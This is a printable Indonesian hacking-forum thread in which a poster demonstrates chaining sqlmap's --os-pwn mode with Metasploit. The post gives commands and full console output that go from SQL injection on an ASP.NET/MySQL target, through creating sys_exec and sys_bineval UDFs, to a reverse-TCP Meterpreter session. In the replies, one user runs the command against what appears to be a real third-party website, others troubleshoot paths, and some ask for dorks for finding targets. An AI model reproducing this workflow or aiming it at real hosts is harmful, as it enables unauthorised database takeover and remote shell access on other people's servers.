Integrasi SQLMAP dengan METASPLOIT - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: Integrasi SQLMAP dengan METASPLOIT (/thread-4127.html) Pages:
1
2
|
Integrasi SQLMAP dengan METASPLOIT - zee eichel - 12-06-2012 sebagai framework , metasploit memiliki kemampuan untuk terintegrasi dengan berbagai tools lainnya .. sebagai contoh kli ini saya akan mengintegrasikan metasploit dengan sqlmap , tools analisis kerentanan pada database sql :-bd Untuk tutorial mengenai sqlmap .. dapat anda lihat di http://indonesianbacktrack.or.id/forum/search.php?action=results&sid=f0fdce9f5e744ca3b7a346873a5a69df&sortby=&order=desc Code: root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://localhost.com/example.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/ Untuk saat ini , maaf saya memakai dracos linux sebagai contoh ...dapat anda sesuaikan dengan os pentest anda Code: root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://situs-target.com/pagevulner.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/ some shit for a walker area ... [shcode=bash][INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: MySQL 5.0 [12:9:13] [INFO] fingerprinting the back-end DBMS operating system [12:9:15] [INFO] the back-end DBMS operating system is Windows how do you want to establish the tunnel? [1] TCP: Metasploit Framework (default) [2] ICMP: icmpsh - ICMP tunneling > [16:10:05] [INFO] testing if current user is DBA [12:10:15] [INFO] fetching current user what is the back-end database management system architecture? [1] 32-bit (default) [2] 64-bit > [12:10:07] [INFO] checking if UDF 'sys_bineval' already exist [12:10:08] [INFO] checking if UDF 'sys_exec' already exist [12:10:10] [INFO] detecting back-end DBMS version from its banner [12:10:12] [INFO] retrieving MySQL base directory absolute path [12:10:13] [INFO] creating UDF 'sys_bineval' from the binary UDF file [12:10:15] [INFO] creating UDF 'sys_exec' from the binary UDF file how do you want to execute the Metasploit shellcode on the back-end database underlying operating system? [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default) [2] Stand-alone payload stager (file system way) > [hh:mm:29] [INFO] creating Metasploit Framework 3 multi-stage shellcode which connection type do you want to use? [1] Reverse TCP: Connect back from the database host to this machine (default) [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535 [3] Bind TCP: Listen on the database host for a connection > which is the local address? [xxx.xxx.xxx.xxx] which local port number do you want to use? [555] which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC > [12:10:15] [INFO] creation in progress ... done [12:10:16] [INFO] running Metasploit Framework 3 command line interface locally, please wait.. =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 688 exploits - 357 auxiliary - 39 post + -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12655 updated today (2012.12.06) PAYLOAD => windows/meterpreter/reverse_tcp EXITFUNC => thread LPORT => 555 LHOST => xxx.xxx.xxx.xxx [*] Started reverse handler on xxx.xxx.xxx.xxx:555 [*] Starting the payload handler... [hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', please wait.. [*] Sending stage (749056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:9128 -> xxx.xxx.xxx.xxx:555) at Thu Dec 06[/shcode] meterpreter pun terbuka .. RE: Integrasi SQLMAP dengan METASPLOIT - ardian - 12-06-2012 mantap om zee.. ane kasih thank ni,,hehehhe RE: Integrasi SQLMAP dengan METASPLOIT - Clound_Carbelius - 12-06-2012 ane kurang ngerti om ( ( om om, \m/ ane jalanin ini Quote:./sqlmap.py -u "http://www.schubertensemble.com/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/ kluar pertanyaan kaya di gambar ini trus gak kluar Msf nya RE: Integrasi SQLMAP dengan METASPLOIT - czeroo_cool - 12-06-2012 (12-06-2012, 05:01 PM)Clound_Carbelius Wrote: ane kurang ngerti om ( ( Kelihatannya itu document file website mu kurang tepat clound, :d RE: Integrasi SQLMAP dengan METASPLOIT - Clound_Carbelius - 12-06-2012 (12-06-2012, 05:45 PM)czeroo_cool Wrote:(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: om om, \m/ eem bgitu :-bd ane bagi Dork om donk :d :-? RE: Integrasi SQLMAP dengan METASPLOIT - zee eichel - 12-06-2012 yang kurang adalah path metasploit om salah tuh .. emang pathnya itu ? RE: Integrasi SQLMAP dengan METASPLOIT - czeroo_cool - 12-06-2012 (12-06-2012, 05:57 PM)zee eichel Wrote: yang kurang adalah path metasploit om salah tuh .. emang pathnya itu ? Bisa aja di ganti Folder nya @Clound ... Cari dork nya yang ASP aja om.. RE: Integrasi SQLMAP dengan METASPLOIT - koecroet - 12-06-2012 (12-06-2012, 05:01 PM)Clound_Carbelius Wrote: ane kurang ngerti om ( ( itu karna target ente linux, trus salah masukin letak folder deh ente spertinya. ente harus tau letak direktori dari website victim di filesystem, kalo di linux default nya kan di "/var/www/" tuh RE: Integrasi SQLMAP dengan METASPLOIT - [H2] - 12-06-2012 wiiihhh, keren nih om.. trus kalo mau nyari tables, colom and dump gimana, masih samakah perintah nya seperti sqlmap...??? RE: Integrasi SQLMAP dengan METASPLOIT - cyberking - 12-07-2012 wkwkw alhamdulillah dapat ilmu lgi |